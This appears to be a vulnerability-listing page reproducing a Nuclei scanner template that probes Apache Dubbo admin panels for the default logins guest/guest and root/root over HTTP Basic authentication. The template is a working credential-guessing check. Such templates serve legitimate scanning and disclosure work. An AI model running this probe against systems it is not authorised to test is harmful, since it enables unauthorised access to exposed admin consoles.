漏洞描述
Apache Dubbo default admin credentials were discovered.
dubbo-admin-default-login: Apache Dubbo - Default Admin Discovery
PoC代码[已公开]
id: dubbo-admin-default-login
info:
name: Apache Dubbo - Default Admin Discovery
author: ritikchaddha
severity: high
description: Apache Dubbo default admin credentials were discovered.
reference:
- https://www.cnblogs.com/wishwzp/p/9438658.html
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cwe-id: CWE-522
metadata:
max-request: 2
tags: dubbo,apache,default-login,vuln
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Authorization: Basic {{base64(username + ':' + password)}}
attack: pitchfork
payloads:
username:
- guest
- root
password:
- guest
- root
matchers-condition: and
matchers:
- type: word
words:
- "<title>Dubbo Admin</title>"
- "/sysinfo/versions"
- "{{username}}', '/logout')"
condition: and
- type: status
status:
- 200
# digest: 4b0a00483046022100b3e02eb2e98987994090cc242ba5f84ecca1a962f88bbed72066878c19c6f14c0221009dc396e81732b36641c909a178e138f36c8e6e1e0d3410ddeb27bca53ce06de6:922c64590222798bb761d5b6d8e72950